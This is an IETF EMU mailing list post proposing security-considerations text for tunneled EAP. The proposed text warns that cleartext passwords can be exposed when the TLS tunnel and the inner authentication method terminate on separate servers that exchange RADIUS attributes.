How about adding the following section to the security considerations "Separation of TLS tunnel and inner authentication termination
Terminating the inner method at a different location than the outer tunnel needs careful consideration. The inner method data may be vulnerable to modification and eavesdropping between the server that terminates the tunnel and the server that terminates the inner method. For example if a clear text password is used then it may be sent to the inner method server in a RADIUS password attribute which uses weak encryption that may not be suitable protection for many environments. In some cases terminating the tunnel at a different location may make it difficult for a peer to authenticate the server and trust it for further communication. For example, if the TLS tunnel is terminated by a different organization the peer needs to be able to authenticate and authorize the tunnel server to handle secret credentials that it shares with the home server that terminates the inner method. This may not meet the security policy of many environments." Cheers, Joe > -----Original Message----- > From: [email protected] [mailto:[email protected]] On > Behalf Of Joseph Salowey (jsalowey) > Sent: Thursday, August 06, 2009 1:23 PM > To: [email protected] > Subject: [Emu] Issue #24: Backend password attacks > > #24: Backend password attacks > > > Section 4.5 > > > > "These typically > > require the password in its original text form in order to > > authenticate the peer, hence they require the peer to send > > the clear > > text user name and password to the EAP server." > > > > One of the issues with support for cleartext passwords are > > the potential attacks against the AAA backend (e.g. > > User-Password attribute) in split authentication scenarios. > > Is it worth calling this out? > > > > How about adding the following to security considerations section: > > "If the inner method is terminated at a different location > than the outer tunnel then the inner method data may be > vulnerable to modification and eavesdropping between the > server that terminates the tunnel and the server > that terminates the inner method. For example if a clear text > password > is used then it may be sent to the inner method server in a > RADIUS password attribute which uses weak encryption that > may not be suitable protection for many environments. " > > -- > Ticket URL: <http://wiki.tools.ietf.org/wg/emu/trac/ticket/24> > emu <http://tools.ietf.org/wg/emu/> > > _______________________________________________ > Emu mailing list > [email protected] > https://www.ietf.org/mailman/listinfo/emu > _______________________________________________ Emu mailing list [email protected] https://www.ietf.org/mailman/listinfo/emu
